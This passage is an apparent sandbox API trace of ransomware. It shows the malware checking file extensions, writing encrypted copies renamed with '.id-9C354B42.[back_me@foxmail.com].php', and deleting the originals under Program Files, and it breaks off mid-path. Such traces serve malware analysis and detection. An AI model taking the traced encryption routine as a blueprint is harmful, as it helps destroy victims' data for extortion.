[0049.456] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.456] lstrlenW (lpString=".rar") returned 4 [0049.456] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.456] lstrlenW (lpString=".bz2") returned 4 [0049.456] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.456] lstrlenW (lpString=".7z") returned 3 [0049.456] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.456] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.456] lstrlenW (lpString=".dbf") returned 4 [0049.456] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.456] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.456] lstrlenW (lpString=".1cd") returned 4 [0049.456] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.456] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.456] lstrlenW (lpString=".jpg") returned 4 [0049.456] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.456] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.456] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.456] lstrlenW (lpString=".doc") returned 4 [0049.456] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.457] lstrlenW (lpString=".docx") returned 5 [0049.457] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.457] lstrlenW (lpString=".pdf") returned 4 [0049.457] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.457] lstrlenW (lpString=".xls") returned 4 [0049.457] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.457] lstrlenW (lpString=".xlsx") returned 5 [0049.457] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.457] lstrlenW (lpString=".ppt") returned 4 [0049.457] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.457] lstrlenW (lpString=".zip") returned 4 [0049.457] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.457] lstrlenW (lpString=".rar") returned 4 [0049.457] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.457] lstrlenW (lpString=".bz2") returned 4 [0049.457] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.457] lstrlenW (lpString=".7z") returned 3 [0049.457] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.457] lstrlenW (lpString=".dbf") returned 4 [0049.457] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.457] lstrlenW (lpString=".1cd") returned 4 [0049.457] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0049.457] lstrlenW (lpString=".jpg") returned 4 [0049.457] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.459] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.459] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.459] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0049.459] GetLastError () returned 0x0 [0049.459] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x2cc, lpOverlapped=0x0) returned 1 [0049.461] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x2d0, lpOverlapped=0x0) returned 1 [0049.462] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.462] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xfc, lpOverlapped=0x0) returned 1 [0049.462] SetEndOfFile (hFile=0x210) returned 1 [0049.462] CloseHandle (hObject=0x210) returned 1 [0049.462] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.462] SetEndOfFile (hFile=0x1a4) returned 1 [0049.463] CloseHandle (hObject=0x1a4) returned 1 [0049.463] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.463] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config")) returned 1 [0049.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.464] lstrlenW (lpString=".doc") returned 4 [0049.464] lstrcmpiW (lpString1=".doc", lpString2="nfig") returned -1 [0049.464] lstrlenW (lpString=".docx") returned 5 [0049.464] lstrcmpiW (lpString1=".docx", lpString2="onfig") returned -1 [0049.464] lstrlenW (lpString=".pdf") returned 4 [0049.464] lstrcmpiW (lpString1=".pdf", lpString2="nfig") returned -1 [0049.464] lstrlenW (lpString=".xls") returned 4 [0049.464] lstrcmpiW (lpString1=".xls", lpString2="nfig") returned -1 [0049.464] lstrlenW (lpString=".xlsx") returned 5 [0049.464] lstrcmpiW (lpString1=".xlsx", lpString2="onfig") returned -1 [0049.464] lstrlenW (lpString=".ppt") returned 4 [0049.464] lstrcmpiW (lpString1=".ppt", lpString2="nfig") returned -1 [0049.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.464] lstrlenW (lpString=".zip") returned 4 [0049.464] lstrcmpiW (lpString1=".zip", lpString2="nfig") returned -1 [0049.464] lstrlenW (lpString=".rar") returned 4 [0049.464] lstrcmpiW (lpString1=".rar", lpString2="nfig") returned -1 [0049.464] lstrlenW (lpString=".bz2") returned 4 [0049.464] lstrcmpiW (lpString1=".bz2", lpString2="nfig") returned -1 [0049.464] lstrlenW (lpString=".7z") returned 3 [0049.464] lstrcmpiW (lpString1=".7z", lpString2="fig") returned -1 [0049.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.464] lstrlenW (lpString=".dbf") returned 4 [0049.464] lstrcmpiW (lpString1=".dbf", lpString2="nfig") returned -1 [0049.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.464] lstrlenW (lpString=".1cd") returned 4 [0049.464] lstrcmpiW (lpString1=".1cd", lpString2="nfig") returned -1 [0049.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 77 [0049.464] lstrlenW (lpString=".jpg") returned 4 [0049.464] lstrcmpiW (lpString1=".jpg", lpString2="nfig") returned -1 [0049.465] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.465] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0049.466] GetLastError () returned 0x0 [0049.466] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x296a5, lpOverlapped=0x0) returned 1 [0049.470] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x296b0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x296b0, lpOverlapped=0x0) returned 1 [0049.474] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.474] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.474] SetEndOfFile (hFile=0x210) returned 1 [0049.474] CloseHandle (hObject=0x210) returned 1 [0049.474] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.474] SetEndOfFile (hFile=0x1a4) returned 1 [0049.476] CloseHandle (hObject=0x1a4) returned 1 [0049.476] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.476] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg")) returned 1 [0049.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.476] lstrlenW (lpString=".doc") returned 4 [0049.477] lstrcmpiW (lpString1=".doc", lpString2=".MSG") returned -1 [0049.477] lstrlenW (lpString=".docx") returned 5 [0049.477] lstrcmpiW (lpString1=".docx", lpString2="T.MSG") returned -1 [0049.477] lstrlenW (lpString=".pdf") returned 4 [0049.477] lstrcmpiW (lpString1=".pdf", lpString2=".MSG") returned 1 [0049.477] lstrlenW (lpString=".xls") returned 4 [0049.477] lstrcmpiW (lpString1=".xls", lpString2=".MSG") returned 1 [0049.477] lstrlenW (lpString=".xlsx") returned 5 [0049.477] lstrcmpiW (lpString1=".xlsx", lpString2="T.MSG") returned -1 [0049.477] lstrlenW (lpString=".ppt") returned 4 [0049.477] lstrcmpiW (lpString1=".ppt", lpString2=".MSG") returned 1 [0049.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.477] lstrlenW (lpString=".zip") returned 4 [0049.477] lstrcmpiW (lpString1=".zip", lpString2=".MSG") returned 1 [0049.477] lstrlenW (lpString=".rar") returned 4 [0049.477] lstrcmpiW (lpString1=".rar", lpString2=".MSG") returned 1 [0049.477] lstrlenW (lpString=".bz2") returned 4 [0049.477] lstrcmpiW (lpString1=".bz2", lpString2=".MSG") returned -1 [0049.477] lstrlenW (lpString=".7z") returned 3 [0049.477] lstrcmpiW (lpString1=".7z", lpString2="MSG") returned -1 [0049.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.477] lstrlenW (lpString=".dbf") returned 4 [0049.477] lstrcmpiW (lpString1=".dbf", lpString2=".MSG") returned -1 [0049.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.477] lstrlenW (lpString=".1cd") returned 4 [0049.477] lstrcmpiW (lpString1=".1cd", lpString2=".MSG") returned -1 [0049.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.477] lstrlenW (lpString=".jpg") returned 4 [0049.477] lstrcmpiW (lpString1=".jpg", lpString2=".MSG") returned -1 [0049.482] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.482] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.482] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\desktop.ini.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0049.483] GetLastError () returned 0x0 [0049.483] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0xae, lpOverlapped=0x0) returned 1 [0049.484] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xb0, lpOverlapped=0x0) returned 1 [0049.484] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.484] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.484] SetEndOfFile (hFile=0x210) returned 1 [0049.485] CloseHandle (hObject=0x210) returned 1 [0049.606] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.608] SetEndOfFile (hFile=0x1a4) returned 1 [0049.622] CloseHandle (hObject=0x1a4) returned 1 [0049.624] SetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x26) returned 1 [0049.627] DeleteFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 1 [0049.629] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.629] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.629] lstrlenW (lpString=".doc") returned 4 [0049.629] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0049.629] lstrlenW (lpString=".docx") returned 5 [0049.629] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0049.629] lstrlenW (lpString=".pdf") returned 4 [0049.629] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0049.629] lstrlenW (lpString=".xls") returned 4 [0049.629] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0049.629] lstrlenW (lpString=".xlsx") returned 5 [0049.629] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0049.629] lstrlenW (lpString=".ppt") returned 4 [0049.629] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0049.629] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.629] lstrlenW (lpString=".zip") returned 4 [0049.629] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0049.629] lstrlenW (lpString=".rar") returned 4 [0049.629] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0049.629] lstrlenW (lpString=".bz2") returned 4 [0049.629] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0049.629] lstrlenW (lpString=".7z") returned 3 [0049.629] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0049.629] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.629] lstrlenW (lpString=".dbf") returned 4 [0049.629] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0049.629] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.629] lstrlenW (lpString=".1cd") returned 4 [0049.629] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0049.629] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0049.629] lstrlenW (lpString=".jpg") returned 4 [0049.629] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0051.321] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0051.321] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.321] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.321] lstrlenW (lpString=".doc") returned 4 [0051.321] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.321] lstrlenW (lpString=".docx") returned 5 [0051.321] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.321] lstrlenW (lpString=".pdf") returned 4 [0051.321] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.321] lstrlenW (lpString=".xls") returned 4 [0051.321] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.321] lstrlenW (lpString=".xlsx") returned 5 [0051.321] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.321] lstrlenW (lpString=".ppt") returned 4 [0051.321] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.321] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.321] lstrlenW (lpString=".zip") returned 4 [0051.321] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.321] lstrlenW (lpString=".rar") returned 4 [0051.321] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.321] lstrlenW (lpString=".bz2") returned 4 [0051.321] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.321] lstrlenW (lpString=".7z") returned 3 [0051.321] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.321] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.321] lstrlenW (lpString=".dbf") returned 4 [0051.322] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.322] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.322] lstrlenW (lpString=".1cd") returned 4 [0051.322] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.322] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.322] lstrlenW (lpString=".jpg") returned 4 [0051.322] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.322] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0051.322] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.322] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.322] lstrlenW (lpString=".doc") returned 4 [0051.322] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.322] lstrlenW (lpString=".docx") returned 5 [0051.322] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.322] lstrlenW (lpString=".pdf") returned 4 [0051.322] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.322] lstrlenW (lpString=".xls") returned 4 [0051.322] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.322] lstrlenW (lpString=".xlsx") returned 5 [0051.322] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.323] lstrlenW (lpString=".ppt") returned 4 [0051.323] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.323] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.323] lstrlenW (lpString=".zip") returned 4 [0051.323] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.323] lstrlenW (lpString=".rar") returned 4 [0051.323] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.323] lstrlenW (lpString=".bz2") returned 4 [0051.323] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.323] lstrlenW (lpString=".7z") returned 3 [0051.323] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.323] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.323] lstrlenW (lpString=".dbf") returned 4 [0051.323] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.323] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.323] lstrlenW (lpString=".1cd") returned 4 [0051.323] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.323] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.323] lstrlenW (lpString=".jpg") returned 4 [0051.323] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.323] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0051.323] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.323] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.323] lstrlenW (lpString=".doc") returned 4 [0051.324] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.324] lstrlenW (lpString=".docx") returned 5 [0051.324] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.324] lstrlenW (lpString=".pdf") returned 4 [0051.324] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.324] lstrlenW (lpString=".xls") returned 4 [0051.324] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.324] lstrlenW (lpString=".xlsx") returned 5 [0051.324] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.324] lstrlenW (lpString=".ppt") returned 4 [0051.324] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.324] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.324] lstrlenW (lpString=".zip") returned 4 [0051.324] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.324] lstrlenW (lpString=".rar") returned 4 [0051.324] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.324] lstrlenW (lpString=".bz2") returned 4 [0051.324] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.324] lstrlenW (lpString=".7z") returned 3 [0051.324] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.324] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.324] lstrlenW (lpString=".dbf") returned 4 [0051.324] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.324] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.324] lstrlenW (lpString=".1cd") returned 4 [0051.324] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.324] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.324] lstrlenW (lpString=".jpg") returned 4 [0051.324] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.325] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD 